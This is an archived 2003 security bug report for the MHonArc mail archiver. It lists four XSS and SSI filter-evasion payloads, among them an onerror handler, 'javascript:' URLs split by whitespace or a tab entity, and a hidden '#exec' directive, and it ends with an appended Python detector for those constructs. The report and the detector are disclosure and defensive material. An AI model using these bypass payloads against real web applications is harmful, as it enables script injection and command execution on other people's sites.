mhonarc-dev

[Bug #3128] XSS Vulnerabilities

2003-04-05 16:54:47
=================== BUG #3128: FULL BUG SNAPSHOT ===================
http://savannah.nongnu.org/bugs/?func=detailbug&bug_id=3128&group_id=1968

Submitted by: ehood                   Project: MHonArc                      
Submitted on: Sat 04/05/2003 at 17:54
Category:  MIME Filter                Severity:  5 - Major                  
Bug Group:  Security                  Resolution:  None                     
Assigned to:  None                    Status:  Open                         
Platform Version:  All                Perl Version:  All                    
Component Version:  <=2.6.2           Fixed Release:                        

Summary:  XSS Vulnerabilities

Original Submission:  Copied from private message:

The following constructs all came out as working javascript or SSI
directives after I installed mhonarc v2.6.2 and ran them through
mhonarc -single:


<!-<link>-#exec foo -->

<img src=foo onerror="alert(1)">

<img lowsrc="javas
cript:alert(2)">

<img lowsrc="javas&#9;cript:alert(3)">




No Followups Have Been Posted


CC list is empty


No files currently attached


For detailed info, follow this link:
http://savannah.nongnu.org/bugs/?func=detailbug&bug_id=3128&group_id=1968
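
A defender-side check for the four constructs quoted in this report, as an added example in Python; it is not MHonArc's code and not part of the original message. It assumes the first construct works because a filter deletes `<link>` and the remaining text joins into an SSI comment. The tag list, attribute list, scheme allowlist and function names are hypothetical.

```python
import html
import re

# Constructed sample input: the four constructs quoted in the report.
SAMPLES = [
    '<!-<link>-#exec foo -->',
    '<img src=foo onerror="alert(1)">',
    '<img lowsrc="javas\ncript:alert(2)">',
    '<img lowsrc="javas&#9;cript:alert(3)">',
]
# Hypothetical policy values, chosen for this example only.
STRIPPED_TAGS = re.compile(r'</?(?:link|script)\b[^>]*>', re.I)
URL_ATTRS = {'src', 'lowsrc', 'href', 'background', 'action'}
SAFE_SCHEMES = {'http', 'https', 'ftp', 'mailto'}
ATTR = re.compile(r'''([a-z][\w-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)''', re.I)

def strip_to_fixpoint(text):
    """Delete disallowed tags until nothing changes, so a deletion cannot
    leave behind newly joined markup that is never re-examined."""
    while True:
        out = STRIPPED_TAGS.sub('', text)
        if out == text:
            return out
        text = out

def url_scheme(value):
    """Scheme after decoding character references and dropping whitespace
    and control characters (a conservative superset of what browsers ignore)."""
    value = html.unescape(value.strip('"\''))
    value = re.sub(r'[\x00-\x20]', '', value)
    m = re.match(r'([a-z][a-z0-9+.-]*):', value, re.I)
    return m.group(1).lower() if m else None

def findings(fragment):
    """Reasons this fragment must not reach the archive page unescaped."""
    text = strip_to_fixpoint(fragment)
    reasons = []
    if re.search(r'<!--\s*#', text):  # SSI check runs AFTER stripping
        reasons.append('ssi-directive')
    for name, value in ATTR.findall(text):
        name = name.lower()
        if name.startswith('on'):
            reasons.append('event-handler:' + name)
        elif name in URL_ATTRS:
            scheme = url_scheme(value)
            if scheme is not None and scheme not in SAFE_SCHEMES:
                reasons.append('scheme:' + scheme)
    return reasons
```

A literal search of the raw input for `<!--` or `javascript:` finds nothing in the first, third and fourth samples; each is flagged only after stripping or normalization.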
